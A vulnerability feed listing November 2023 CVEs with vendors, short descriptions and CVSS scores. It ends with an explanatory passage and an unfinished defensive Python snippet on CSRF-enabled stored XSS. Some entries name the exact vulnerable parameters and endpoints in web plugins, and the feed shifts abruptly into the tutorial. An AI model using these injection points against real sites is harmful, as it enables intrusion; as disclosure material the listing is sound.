2023-11-14 CVE-2023-45625 Arubanetworks, HP Command Injection vulnerability in multiple products

Multiple authenticated command injection vulnerabilities exist in the command line interface.

7.2
2023-11-14 CVE-2023-45626 Arubanetworks, HP

An authenticated vulnerability has been identified allowing an attacker to effectively establish highly privileged persistent arbitrary code execution across boot cycles.

7.2
2023-11-14 CVE-2023-22448 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow a privileged user to potentially enable escalation of privilege via network access.

7.2
2023-11-14 CVE-2023-36401 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Remote Registry Service Remote Code Execution Vulnerability

7.2
2023-11-14 CVE-2023-44317 Siemens Acceptance of Extraneous Untrusted Data With Trusted Data vulnerability in Siemens products

Affected products do not properly validate the content of uploaded X509 certificates which could allow an attacker with administrative privileges to execute arbitrary code on the device.

7.2
2023-11-14 CVE-2023-45880 Gibbonedu Path Traversal vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder.

7.2
2023-11-16 CVE-2023-6017 H2O Unspecified vulnerability in H2O

H2O included a reference to an S3 bucket that no longer existed allowing an attacker to take over the S3 bucket URL.

7.1
2023-11-15 CVE-2023-34982 Aveva Externally Controlled Reference to a Resource in Another Sphere vulnerability in Aveva products

This external control vulnerability, if exploited, could allow a local OS-authenticated user with standard privileges to delete files with System privilege on the machine where these products are installed, resulting in denial of service.

7.1
2023-11-15 CVE-2023-31100 Phoenix Unspecified vulnerability in Phoenix Securecore Technology

Improper Access Control in SMI handler vulnerability in Phoenix SecureCore™ Technology™ 4 allows SPI flash modification. This issue affects SecureCore™ Technology™ 4:
* from 4.3.0.0 before 4.3.0.203
* from 4.3.1.0 before 4.3.1.163
* from 4.4.0.0 before 4.4.0.217
* from 4.5.0.0 before 4.5.0.138

7.1
2023-11-14 CVE-2023-47630 Kyverno Insufficient Verification of Data Authenticity vulnerability in Kyverno

Kyverno is a policy engine designed for Kubernetes.

7.1
2023-11-14 CVE-2022-40681 Fortinet Incorrect Authorization vulnerability in Fortinet Forticlient

An incorrect authorization in Fortinet FortiClient (Windows) 7.0.0 - 7.0.7, 6.4.0 - 6.4.9, 6.2.0 - 6.2.9 and 6.0.0 - 6.0.10 allows an attacker to cause denial of service via sending a crafted request to a specific named pipe.

7.1
2023-11-14 CVE-2023-32701 Blackberry Unspecified vulnerability in Blackberry QNX Software Development Platform 6.6.0/7.0/7.1

Improper Input Validation in the Networking Stack of QNX SDP version(s) 6.6, 7.0, and 7.1 could allow an attacker to potentially cause Information Disclosure or a Denial-of-Service condition.

7.1
2023-11-14 CVE-2023-36046 Microsoft Unspecified vulnerability in Microsoft products

Windows Authentication Denial of Service Vulnerability

7.1
2023-11-14 CVE-2023-36399 Microsoft Unspecified vulnerability in Microsoft products

Windows Storage Elevation of Privilege Vulnerability

7.1
2023-11-14 CVE-2023-36394 Microsoft Unspecified vulnerability in Microsoft products

Windows Search Service Elevation of Privilege Vulnerability

7.0
2023-11-14 CVE-2023-36403 Microsoft Unspecified vulnerability in Microsoft products

Windows Kernel Elevation of Privilege Vulnerability

7.0
2023-11-14 CVE-2023-36405 Microsoft Unspecified vulnerability in Microsoft products

Windows Kernel Elevation of Privilege Vulnerability

7.0
2023-11-14 CVE-2023-36427 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Elevation of Privilege Vulnerability

7.0

312 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-14 CVE-2023-27383 Intel Unspecified vulnerability in Intel products

Protection mechanism failure in some Intel(R) oneAPI HPC Toolkit 2023.1 and Intel(R)MPI Library software before version 2021.9 may allow a privileged user to potentially enable escalation of privilege via adjacent access.

6.8
2023-11-14 CVE-2023-38177 Microsoft Unspecified vulnerability in Microsoft Sharepoint Enterprise Server and Sharepoint Server

Microsoft SharePoint Server Remote Code Execution Vulnerability

6.8
2023-11-14 CVE-2023-46446 Asyncssh Project Authorization Bypass Through User-Controlled Key vulnerability in Asyncssh Project Asyncssh

An issue in AsyncSSH before 2.14.1 allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation, aka a "Rogue Session Attack."

6.8
2023-11-16 CVE-2023-32469 Dell Improper Input Validation vulnerability in Dell products

Dell Precision Tower BIOS contains an Improper Input Validation vulnerability.

6.7
2023-11-14 CVE-2022-24379 Intel Unspecified vulnerability in Intel products

Improper input validation in some Intel(R) Server System M70KLP Family BIOS firmware before version 01.04.0029 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-29262 Intel Unspecified vulnerability in Intel products

Improper buffer restrictions in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-29510 Intel Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Intel products

Improper buffer restrictions in some Intel(R) Server Board M10JNP2SB BIOS firmware before version 7.219 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-33945 Intel Unspecified vulnerability in Intel products

Improper input validation in some Intel(R) Server board and Intel(R) Server System BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-36374 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmi Windows 5.27.03.0003 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-36396 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmiEdit-Linux-5.27.06.0017 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2023-20567 Intel, AMD Improper Verification of Cryptographic Signature vulnerability in multiple products

Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch AMDSoftwareInstaller.exe without validating the file signature potentially leading to arbitrary code execution.

6.7
2023-11-14 CVE-2023-20568 Intel, AMD Improper Verification of Cryptographic Signature vulnerability in multiple products

Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch RadeonInstaller.exe without validating the file signature potentially leading to arbitrary code execution.

6.7
2023-11-14 CVE-2023-29177 Fortinet Classic Buffer Overflow vulnerability in Fortinet Fortiadc and Fortiddos-F

Multiple buffer copy without checking size of input ('classic buffer overflow') vulnerabilities [CWE-120] in FortiADC version 7.2.0 and before 7.1.2 & FortiDDoS-F version 6.5.0 and before 6.4.1 allows a privileged attacker to execute arbitrary code or commands via specifically crafted CLI requests.

6.7
2023-11-14 CVE-2023-32662 Intel Unspecified vulnerability in Intel Battery Life Diagnostic Tool 1.0.7/2.2.0

Improper authorization in some Intel Battery Life Diagnostic Tool installation software before version 2.2.1 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2023-34431 Intel Unspecified vulnerability in Intel products

Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2023-28002 Fortinet Improper Validation of Integrity Check Value vulnerability in Fortinet Fortios

An improper validation of integrity check value vulnerability [CWE-354] in FortiOS 7.2.0 through 7.2.3, 7.0.0 through 7.0.12, 6.4 all versions, 6.2 all versions, 6.0 all versions and FortiProxy 7.2 all versions, 7.0 all versions, 2.0 all versions VMs may allow a local attacker with admin privileges to boot a malicious image on the device and bypass the filesystem integrity check in place.

6.7
2023-11-14 CVE-2023-6006 Papercut Unspecified vulnerability in Papercut MF

This vulnerability potentially allows local attackers to escalate privileges on affected installations of PaperCut NG.

6.7
2023-11-16 CVE-2023-36008 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

6.6
2023-11-18 CVE-2023-48736 Color Out-of-bounds Read vulnerability in Color Demoiccmax 20231109

In International Color Consortium DemoIccMAX 3e7948b, CIccCLUT::Interp2d in IccTagLut.cpp in libSampleICC.a has an out-of-bounds read.

6.5
2023-11-18 CVE-2023-40363 IBM Incorrect Default Permissions vulnerability in IBM Infosphere Information Server 11.7

IBM InfoSphere Information Server 11.7 could allow an authenticated user to change installation files due to incorrect file permission settings.

6.5
2023-11-17 CVE-2023-48024 Howerj Use After Free vulnerability in Howerj Liblisp

Liblisp through commit 4c65969 was discovered to contain a use-after-free vulnerability in void hash_destroy(hash_table_t *h) at hash.c.

6.5
2023-11-17 CVE-2023-22268 Adobe SQL Injection vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead to information disclosure by a low-privileged authenticated attacker.

6.5
2023-11-17 CVE-2023-38314 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

6.5
2023-11-17 CVE-2023-42428 Cubecart Path Traversal vulnerability in Cubecart

Directory traversal vulnerability in CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to delete directories and files in the system.

6.5
2023-11-16 CVE-2023-6174 Wireshark, Debian Injection vulnerability in multiple products

SSH dissector crash in Wireshark 4.0.0 to 4.0.10 allows denial of service via packet injection or crafted capture file.

6.5
2023-11-16 CVE-2023-43757 Elecom Inadequate Encryption Strength vulnerability in Elecom products

Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD.

6.5
2023-11-16 CVE-2023-47335 Autelrobotics Incorrect Default Permissions vulnerability in Autelrobotics EVO Nano Drone Firmware 1.6.5

Insecure permissions in the setNFZEnable function of Autel Robotics EVO Nano drone v1.6.5 allows attackers to breach the geo-fence and fly into no-fly zones.

6.5
2023-11-16 CVE-2023-47471 Struktur Classic Buffer Overflow vulnerability in Struktur Libde265 1.0.12

Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.

6.5
2023-11-16 CVE-2023-48204 Publiccms Server-Side Request Forgery (SSRF) vulnerability in Publiccms 4.0.202302.E

An issue in PublicCMS v.4.0.202302.e allows a remote attacker to obtain sensitive information via the appToken and Parameters parameter of the api/method/getHtml component.

6.5
2023-11-15 CVE-2023-43588 Zoom Unspecified vulnerability in Zoom Meetings

Insufficient control flow management in some Zoom clients may allow an authenticated user to conduct an information disclosure via network access.

6.5
2023-11-14 CVE-2023-39199 Zoom Unspecified vulnerability in Zoom products

Cryptographic issues with In-Meeting Chat for some Zoom clients may allow a privileged user to conduct an information disclosure via network access.

6.5
2023-11-14 CVE-2023-39205 Zoom Improper Check for Unusual or Exceptional Conditions vulnerability in Zoom products

Improper conditions check in Zoom Team Chat for Zoom clients may allow an authenticated user to conduct a denial of service via network access.

6.5
2023-11-14 CVE-2023-45627 Arubanetworks, HP

An authenticated Denial-of-Service (DoS) vulnerability exists in the CLI service.

6.5
2023-11-14 CVE-2023-5189 Redhat Path Traversal vulnerability in Redhat Ansible Automation Platform and Satellite

A path traversal vulnerability exists in Ansible when extracting tarballs.

6.5
2023-11-14 CVE-2023-46023 Code Projects SQL Injection vulnerability in Code-Projects Simple Task List 1.0

SQL injection vulnerability in addTask.php in Code-Projects Simple Task List 1.0 allows attackers to obtain sensitive information via the 'status' parameter.

6.5
2023-11-14 CVE-2023-46132 Hyperledger Race Condition vulnerability in Hyperledger Fabric

Hyperledger Fabric is an open source permissioned distributed ledger framework.

6.5
2023-11-14 CVE-2023-47641 Aiohttp HTTP Request Smuggling vulnerability in Aiohttp

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python.

6.5
2023-11-14 CVE-2023-20592 AMD Unspecified vulnerability in AMD products

Improper or unexpected behavior of the INVD instruction in some AMD CPUs may allow an attacker with a malicious hypervisor to affect cache line write-back behavior of the CPU leading to a potential loss of guest virtual machine (VM) memory integrity.

6.5
2023-11-14 CVE-2023-22290 Intel Improper Check for Unusual or Exceptional Conditions vulnerability in Intel Unison Software

Uncaught exception for some Intel Unison software may allow an authenticated user to potentially enable denial of service via network access.

6.5
2023-11-14 CVE-2023-28376 Intel Out-of-bounds Read vulnerability in Intel products

Out-of-bounds read in the firmware for some Intel(R) E810 Ethernet Controllers and Adapters before version 1.7.1 may allow an unauthenticated user to potentially enable denial of service via adjacent access.

6.5
2023-11-14 CVE-2023-38131 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validation for some Intel Unison software may allow an authenticated user to potentially enable denial of service via network access.

6.5
2023-11-14 CVE-2023-36043 Microsoft Exposure of Resource to Wrong Sphere vulnerability in Microsoft System Center Operations Manager 2016/2019/2022

Open Management Infrastructure Information Disclosure Vulnerability

6.5
2023-11-14 CVE-2023-36398 Microsoft Unspecified vulnerability in Microsoft products

Windows NTFS Information Disclosure Vulnerability

6.5
2023-11-14 CVE-2023-36413 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Office Security Feature Bypass Vulnerability

6.5
2023-11-14 CVE-2023-36641 Fortinet Numeric Truncation Error vulnerability in Fortinet Fortios and Fortiproxy

A numeric truncation error in Fortinet FortiProxy version 7.2.0 through 7.2.4, FortiProxy version 7.0.0 through 7.0.10, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1 all versions, FortiProxy 1.0 all versions, FortiOS version 7.4.0, FortiOS version 7.2.0 through 7.2.5, FortiOS version 7.0.0 through 7.0.12, FortiOS 6.4 all versions, FortiOS 6.2 all versions, FortiOS 6.0 all versions allows an attacker to cause a denial of service via specifically crafted HTTP requests.

6.5
2023-11-14 CVE-2023-41676 Fortinet Insufficiently Protected Credentials vulnerability in Fortinet Fortisiem

An exposure of sensitive information to an unauthorized actor [CWE-200] in FortiSIEM version 7.0.0 and before 6.7.5 may allow an attacker with access to Windows agent logs to obtain the Windows agent password by searching through the logs.

6.5
2023-11-14 CVE-2023-43505 Siemens Improper Access Control vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions).

6.5
2023-11-14 CVE-2023-44321 Siemens Resource Exhaustion vulnerability in Siemens products

Affected devices do not properly validate the length of inputs when performing certain configuration changes in the web interface allowing an authenticated attacker to cause a denial of service condition.

6.5
2023-11-14 CVE-2023-46096 Siemens Missing Authentication for Critical Function vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

6.5
2023-11-14 CVE-2023-43900 Emsigner Authorization Bypass Through User-Controlled Key vulnerability in Emsigner 2.8.7

Insecure Direct Object References (IDOR) in EMSigner v2.8.7 allow attackers to gain unauthorized access to application content and view sensitive data of other users via manipulation of the documentID and EncryptedDocumentId parameters.

6.5
2023-11-13 CVE-2023-23684 Wpengine Unspecified vulnerability in Wpengine Wpgraphql

Server-Side Request Forgery (SSRF) vulnerability in WPGraphQL. This issue affects WPGraphQL: from n/a through 1.14.5.

6.5
2023-11-13 CVE-2023-23800 Getshortcodes Server-Side Request Forgery (SSRF) vulnerability in Getshortcodes Shortcodes Ultimate

Server-Side Request Forgery (SSRF) vulnerability in Vova Anokhin WP Shortcodes Plugin — Shortcodes Ultimate. This issue affects WP Shortcodes Plugin — Shortcodes Ultimate: from n/a through 5.12.6.

6.5
2023-11-13 CVE-2023-41239 Blubrry Server-Side Request Forgery (SSRF) vulnerability in Blubrry Powerpress

Server-Side Request Forgery (SSRF) vulnerability in Blubrry PowerPress Podcasting plugin by Blubrry. This issue affects PowerPress Podcasting plugin by Blubrry: from n/a through 11.0.6.

6.5
2023-11-18 CVE-2023-40809 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Activity Search Criteria-Activity Number.

6.1
2023-11-18 CVE-2023-40810 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via Product Name Field.

6.1
2023-11-18 CVE-2023-40812 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Accounts Group Name Field.

6.1
2023-11-18 CVE-2023-40813 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via Activity Saved Search Creation.

6.1
2023-11-18 CVE-2023-40814 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Accounts Name Field.

6.1
2023-11-18 CVE-2023-40815 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Category Creation Name Field.

6.1
2023-11-18 CVE-2023-40816 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via Activity Milestone Name Field.

6.1
2023-11-18 CVE-2023-40817 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Product Configuration Name Field.

6.1
2023-11-17 CVE-2023-44352 Adobe Cross-site Scripting vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability.

6.1
2023-11-17 CVE-2020-11448 Bell Cross-site Scripting vulnerability in Bell Home HUB 3000 Firmware Sg48222070

An issue was discovered on Bell HomeHub 3000 SG48222070 devices.

6.1
2023-11-17 CVE-2023-47797 Liferay Cross-site Scripting vulnerability in Liferay Portal

Reflected cross-site scripting (XSS) vulnerability on a content page’s edit page in Liferay Portal 7.4.3.94 through 7.4.3.95 allows remote attackers to inject arbitrary web script or HTML via the `p_l_back_url_title` parameter.

6.1
2023-11-16 CVE-2023-40314 Opennms Cross-site Scripting vulnerability in Opennms Horizon

Cross-site scripting in bootstrap.jsp in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information.

6.1
2023-11-16 CVE-2023-28621 Wishfulthemes Cross-site Scripting vulnerability in Wishfulthemes Raise MAG and Wishful Blog

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wishfulthemes Raise Mag, Wishfulthemes Wishful Blog themes allows Reflected XSS. This issue affects Raise Mag: from n/a through 1.0.7; Wishful Blog: from n/a through 2.0.1.

6.1
2023-11-16 CVE-2023-32796 Mingocommerce Cross-site Scripting vulnerability in Mingocommerce Woocommerce Product Enquiry

Unauth.

6.1
2023-11-16 CVE-2023-34375 10Web Cross-site Scripting vulnerability in 10Web SEO

Unauth.

6.1
2023-11-16 CVE-2023-39926 Acurax Cross-site Scripting vulnerability in Acurax Under Construction / Maintenance Mode 2.6

Unauth.

6.1
2023-11-16 CVE-2023-47508 Averta Cross-site Scripting vulnerability in Averta Master Slider 3.2.7/3.5.1

Unauth.

6.1
2023-11-16 CVE-2023-47509 Ioannup Cross-site Scripting vulnerability in Ioannup Edit Woocommerce Templates

Unauth.

6.1
2023-11-16 CVE-2023-47512 Wphive Cross-site Scripting vulnerability in Wphive Product Enquiry for Woocommerce

Unauth.

6.1
2023-11-16 CVE-2023-47514 Star Emea Cross-site Scripting vulnerability in Star-Emea Star Cloudprnt for Woocommerce

Unauth.

6.1
2023-11-16 CVE-2023-4771 Cksource Unspecified vulnerability in Cksource Ckeditor

A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier.

6.1
2023-11-15 CVE-2023-41699 Payara Open Redirect vulnerability in Payara

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Payara Platform Payara Server, Micro and Embedded (Servlet Implementation modules) allows Redirect Access to Libraries. This issue affects Payara Server, Micro and Embedded: from 5.0.0 before 5.57.0, from 4.1.2.191 before 4.1.2.191.46, from 6.0.0 before 6.8.0, from 6.2023.1 before 6.2023.11.

6.1
2023-11-15 CVE-2023-48219 Tiny Cross-site Scripting vulnerability in Tiny Tinymce

TinyMCE is an open source rich text editor.

6.1
2023-11-15 CVE-2023-4602 Kibokolabs Cross-site Scripting vulnerability in Kibokolabs Namaste! LMS

The Namaste! LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'course_id' parameter in versions up to, and including, 2.6.1.1 due to insufficient input sanitization and output escaping.

6.1
2023-11-15 CVE-2023-41597 Eyoucms Cross-site Scripting vulnerability in Eyoucms 1.6.2

EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.

6.1
2023-11-15 CVE-2023-5986 Schneider Electric Open Redirect vulnerability in Schneider-Electric Ecostruxure Power Monitoring Expert 2020/2021

A CWE-601 URL Redirection to Untrusted Site vulnerability exists that could cause an open redirect vulnerability leading to a cross site scripting attack.

6.1
2023-11-15 CVE-2023-5987 Schneider Electric Cross-site Scripting vulnerability in Schneider-Electric Ecostruxure Power Monitoring Expert 2020/2021

A CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) vulnerability exists that could lead to a cross site scripting condition where attackers can have a victim's browser run arbitrary JavaScript when they visit a page containing the injected payload.

6.1
2023-11-14 CVE-2023-47517 Pressified Cross-site Scripting vulnerability in Pressified Sendpress

Unauth.

6.1
2023-11-14 CVE-2023-47518 Vfbpro Cross-site Scripting vulnerability in Vfbpro Restrict Categories

Unauth.

6.1
2023-11-14 CVE-2023-47520 Michaeluno Cross-site Scripting vulnerability in Michaeluno Responsive Column Widgets

Unauth.

6.1
2023-11-14 CVE-2023-47522 Photofeed Cross-site Scripting vulnerability in Photofeed Photo Feed

Unauth.

6.1
2023-11-14 CVE-2023-47524 Codebard Cross-site Scripting vulnerability in Codebard Patron Button and Widgets for Patreon

Unauth.

6.1
2023-11-14 CVE-2023-47532 Themeum Cross-site Scripting vulnerability in Themeum WP Crowdfunding

Unauth.

6.1
2023-11-14 CVE-2023-47544 Atarim Cross-site Scripting vulnerability in Atarim Visual Collaboration

Unauth.

6.1
2023-11-14 CVE-2023-47547 Wpfactory Cross-site Scripting vulnerability in Wpfactory Products, Order & Customers Export for Woocommerce

Unauth.

6.1
2023-11-14 CVE-2023-47549 Spider Themes Cross-site Scripting vulnerability in Spider-Themes Eazydocs

Unauth.

6.1
2023-11-14 CVE-2023-47125 Typo3 Cross-site Scripting vulnerability in Typo3 Html Sanitizer and Typo3

TYPO3 is an open source PHP based web content management system released under the GNU GPL.

6.1
2023-11-14 CVE-2023-47550 Rednao Cross-Site Request Forgery (CSRF) vulnerability in Rednao Donations Made Easy - Smart Donations

Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations allows Stored XSS. This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.

6.1
2023-11-14 CVE-2021-46758 AMD Unspecified vulnerability in AMD products

Insufficient validation of SPI flash addresses in the ASP (AMD Secure Processor) bootloader may allow an attacker to read data in memory mapped beyond SPI flash resulting in a potential loss of availability and integrity.

6.1
2023-11-14 CVE-2023-36030 Microsoft Unspecified vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 Sales Spoofing Vulnerability

6.1
2023-11-14 CVE-2023-48094 Cesium Cross-site Scripting vulnerability in Cesium Cesiumjs 1.111

A cross-site scripting (XSS) vulnerability in CesiumJS v1.111 allows attackers to execute arbitrary code in the context of the victim's browser via sending a crafted payload to /container_files/public_html/doc/index.html.

6.1
2023-11-14 CVE-2023-45881 Gibbonedu Cross-site Scripting vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS.

6.1
2023-11-14 CVE-2023-47665 Plainviewplugins Cross-site Scripting vulnerability in Plainviewplugins Plainview Protect Passwords

Unauth.

6.1
2023-11-14 CVE-2023-47673 Thecrowned Cross-site Scripting vulnerability in Thecrowned Post PAY Counter 2.789

Unauth.

6.1
2023-11-14 CVE-2023-47684 Themepunch Cross-site Scripting vulnerability in Themepunch Essential Grid

Unauth.

6.1
2023-11-13 CVE-2023-46019 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to inject arbitrary script via the 'error' parameter.

6.1
2023-11-13 CVE-2023-46020 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to inject arbitrary script via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

6.1
2023-11-13 CVE-2023-47690 Antonbond Cross-site Scripting vulnerability in Antonbond Additional Order Filters for Woocommerce

Unauth.

6.1
2023-11-13 CVE-2023-47695 Scribit Cross-site Scripting vulnerability in Scribit Shortcodes Finder

Unauth.

6.1
2023-11-13 CVE-2023-47696 Gravitymaster Cross-site Scripting vulnerability in Gravitymaster Product Enquiry for Woocommerce

Unauth.

6.1
2023-11-13 CVE-2023-47697 WP Eventmanager Cross-site Scripting vulnerability in Wp-Eventmanager WP Event Manager

Unauth.

6.1
2023-11-13 CVE-2023-4603 Star Emea Cross-site Scripting vulnerability in Star-Emea Star Cloudprnt for Woocommerce

The Star CloudPRNT for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'printersettings' parameter in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping.

6.1
2023-11-13 CVE-2023-46015 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to inject arbitrary script via the 'msg' parameter in the application URL.

6.1
2023-11-13 CVE-2023-46016 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to inject arbitrary script via the 'search' parameter in the application URL.

6.1
2023-11-13 CVE-2023-31230 Baidu Tongji Generator Project Cross-Site Request Forgery (CSRF) vulnerability in Baidu-Tongji-Generator Project Baidu-Tongji-Generator 1.0.2

Cross-Site Request Forgery (CSRF) vulnerability in Haoqisir Baidu Tongji generator allows Stored XSS. This issue affects Baidu Tongji generator: from n/a through 1.0.2.

6.1
2023-11-13 CVE-2023-32123 Dream Theme Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 11.6.0/11.7.3

Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 allows Stored XSS. This issue affects The7: from n/a through 11.7.3.

6.1
2023-11-13 CVE-2023-35877 Vadimk Cross-Site Request Forgery (CSRF) vulnerability in Vadimk Extra User Details

Cross-Site Request Forgery (CSRF) vulnerability in Vadym K.

6.1
2023-11-13 CVE-2023-39166 Tagdiv Cross-Site Request Forgery (CSRF) vulnerability in Tagdiv Composer 4.2

Cross-Site Request Forgery (CSRF) vulnerability in tagDiv tagDiv Composer allows Cross-Site Scripting (XSS). This issue affects tagDiv Composer: from n/a before 4.4.

6.1
2023-11-13 CVE-2023-6098 Icssolution Cross-site Scripting vulnerability in Icssolution ICS Business Manager 7.06.0028.2802/7.06.0028.7066/7.06.0028.7089

An XSS vulnerability has been discovered in ICS Business Manager affecting version 7.06.0028.7066.

6.1
2023-11-13 CVE-2023-40335 Cyberws Cross-Site Request Forgery (CSRF) vulnerability in Cyberws Cleverwise Daily Quotes

Cross-Site Request Forgery (CSRF) vulnerability in Jeremy O'Connell Cleverwise Daily Quotes allows Stored XSS. This issue affects Cleverwise Daily Quotes: from n/a through 3.2.

6.1
2023-11-13 CVE-2023-46092 Lionscripts Cross-Site Request Forgery (CSRF) vulnerability in Lionscripts Webmaster Tools

Cross-Site Request Forgery (CSRF) vulnerability in LionScripts.Com Webmaster Tools allows Stored XSS. This issue affects Webmaster Tools: from n/a through 2.0.

6.1
2023-11-13 CVE-2023-46201 Auto Login NEW User After Registration Project Cross-Site Request Forgery (CSRF) vulnerability in Auto Login NEW User After Registration Project Auto Login NEW User After Registration

Cross-Site Request Forgery (CSRF) vulnerability in Jeff Sherk Auto Login New User After Registration allows Stored XSS. This issue affects Auto Login New User After Registration: from n/a through 1.9.6.

6.1
2023-11-13 CVE-2023-46634 Phoeniixx Cross-Site Request Forgery (CSRF) vulnerability in Phoeniixx Custom MY Account for Woocommerce

Cross-Site Request Forgery (CSRF) vulnerability in phoeniixx Custom My Account for Woocommerce allows Cross-Site Scripting (XSS). This issue affects Custom My Account for Woocommerce: from n/a through 2.1.

6.1
2023-11-13 CVE-2023-47516 Starkdigital Cross-Site Request Forgery (CSRF) vulnerability in Starkdigital Category Post List Widget 1.1/1.2/2.0

Cross-Site Request Forgery (CSRF) vulnerability in Stark Digital Category Post List Widget allows Stored XSS. This issue affects Category Post List Widget: from n/a through 2.0.

6.1
2023-11-13 CVE-2023-47652 Autoaffiliatelinks Cross-Site Request Forgery (CSRF) vulnerability in Autoaffiliatelinks Auto Affiliate Links

Cross-Site Request Forgery (CSRF) vulnerability in Lucian Apostol Auto Affiliate Links allows Stored XSS. This issue affects Auto Affiliate Links: from n/a through 6.4.2.4.

6.1
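The dozen "CSRF allows Stored XSS" entries above share one pattern: a plugin's settings-save handler trusts any request that carries the administrator's session cookie, so a form auto-submitted from an attacker's page writes attacker-controlled markup into an option that is later rendered unescaped. The following is an added illustration of that pattern and of the two independent fixes (a session-bound anti-CSRF token on the write path, and output escaping on the read path); it is constructed for this report and is not code from any plugin listed here. The handler names, the `footer_text` option, the session identifier and the server secret are all hypothetical.

```python
import hashlib
import hmac
import html
import secrets

# Constructed example (not code from any plugin listed in this report): a
# minimal settings-save handler showing why a missing anti-CSRF token turns a
# cross-site form post into stored XSS, and the two independent fixes.

SERVER_SECRET = secrets.token_bytes(32)  # hypothetical per-install key


def issue_nonce(session_id: str, action: str) -> str:
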